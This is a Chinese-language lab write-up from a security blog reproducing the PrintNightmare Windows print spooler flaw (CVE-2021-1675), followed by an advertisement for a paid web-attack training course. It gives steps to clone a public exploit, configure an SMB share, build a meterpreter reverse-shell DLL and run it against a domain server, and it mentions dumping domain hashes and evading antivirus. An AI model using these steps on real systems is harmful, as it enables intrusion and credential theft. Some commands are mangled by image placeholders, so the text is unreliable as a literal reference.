微软通杀漏洞-CVE-2021-1675复现

文章来源|MS08067安全实验室

本文作者:龙诺(Web知识星球追洞小组)

一  准备环境

实验环境:windows2019 (192.168.189.145)

kali linux (192.168.189.146)

需要:一个普通的域账户

需要:开启 print spooler服务

使用反弹shell :需要关闭windows2019的安全中心 或者用免杀 

需要:windows2019安装smb1协议(没有这个会报错)

二 搭建环境

安装imp我这里使用的是python虚拟环境安装搭建这样的好处是不破坏系统环境,因为python有时候安装各种模块多了容易冲突所一我们使用虚拟环境。

构造虚拟环境

virtualenv -p python3 文件夹

如果没有virtualenv的话需要你pip安装模块

构造完成以后我们使用

source 文件夹/bin/activate

进入后我们去github下载poc安装

git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket

首先要下载poc impacket模块然后安装

微软通杀漏洞-CVE-2021-1675复现

因为我们使用的是虚拟环境所以我们可以直接安装安装完以后切换到poc处就可以了

source 文件夹/bin/activate python setup.py install python CVE-2021-1675.py -h

配置smb服务器

[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2

[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes

按照这个配置以后就可以使用impacket-smbserver 文件名、目录、开启服务器,如图

微软通杀漏洞-CVE-2021-1675复现

生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_微软通杀漏洞-CVE-2021-1675复现 微软通杀漏洞-CVE-2021-1675复现 微软通杀漏洞-CVE-2021-1675复现

利用python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\192.168.189.146smbrever.dll'

微软通杀漏洞-CVE-2021-1675复现

如果出错则需要安装smb1在windows2019上出错代码,下图

微软通杀漏洞-CVE-2021-1675复现

可以现在2019连接smb服务器出现这种报错

微软通杀漏洞-CVE-2021-1675复现

成功,下图

微软通杀漏洞-CVE-2021-1675复现

impacket-smbserver服务器也会有数据交互

微软通杀漏洞-CVE-2021-1675复现

同时会有反弹shell

微软通杀漏洞-CVE-2021-1675复现

我们可以直接查看域中账户hash 进行横向渗透

微软通杀漏洞-CVE-2021-1675复现
dll文件在windows

上传成功,如果开着windows安全中心会出现图

微软通杀漏洞-CVE-2021-1675复现

上传不成功

微软通杀漏洞-CVE-2021-1675复现

这里就要考虑免杀了,切记只能是普通账户

微软通杀漏洞-CVE-2021-1675复现

漏洞扫描

https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare

微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现

总结

需要了解smb配置

windows2019域配置

在kali无法连接2019的时候逆向思考看看2019可以连接smb共享文件码?

https://github.com/cube0x0/CVE-2021-1675/issues/36 这里也有人问这个问题我不知道他解决了吗?

微软通杀漏洞-CVE-2021-1675复现

我是受下面一句话很长时间突然开悟了2019可以链接吗?

微软通杀漏洞-CVE-2021-1675复现复现看着简单但是各种环境问题还有小白配置问题只有复现了才知道!

追洞小组负责人Taoing主讲

WEB高级攻防实战班 第1期  来袭

课程围绕:外围打点、边界突破、PHP审计、SRC漏洞挖掘、应急响应

课程大纲(最新)

微软通杀漏洞-CVE-2021-1675复现*大纲仅作为参考,会根据当期进度有所变化(加客服获取高清课程导图)

课程目录(最新)

微软通杀漏洞-CVE-2021-1675复现

课程费用

每期班定价2999第一期班首发价:2499前50名送365元Web安全知识星球名额),每个报名学员都可享受一次免费的重听权益,一次没学懂就再来一遍,后续培训可任选一期来听。请有意参加培训的学员抓紧报名!

支持支付宝、信用卡、花呗分期,对公转账,可开发票!

学习资源

前50名报名同学,送365元Web知识星球名额,可提前先行学习Web安全相关知识,并提供课程中需要的相关软件和环境。

上课时间

每周一、二、三、四的晚上 19:00-21:00 ,共24天,48课时,为期6周。如果无法准时参加直播课程,在线培训的每节课程都会被录制成视频上传到学员区,可随时下载观看。

上课方式

培训采用在线直播+随堂录播+微信群解答的形式,无需等待,报名后立即进入“Web星球”开始预习。

讲师介绍

Taoing:MS08067安全实验室核心成员,Web安全知识星球合伙人,安恒信息安全高级工程师,擅长企业安全研究、情报分析、渗透测试,安全开发。

TtssGkf:MS08067安全实验室核心成员,Web安全知识星球合伙人,Defcon Group 86021议题分享者,致力于漏洞分析、代码审计、漏洞挖掘。

    你距离大佬,只差一个决定       

详情咨询请联系小客服

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

微软通杀漏洞-CVE-2021-1675复现 微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现 微软通杀漏洞-CVE-2021-1675复现

来和5000+位同学一起加入星球学习吧!

微软通杀漏洞-CVE-2021-1675复现

版权声明:玥玥 发表于 2021-08-22 1:39:05。
转载请注明:微软通杀漏洞-CVE-2021-1675复现 | 女黑客导航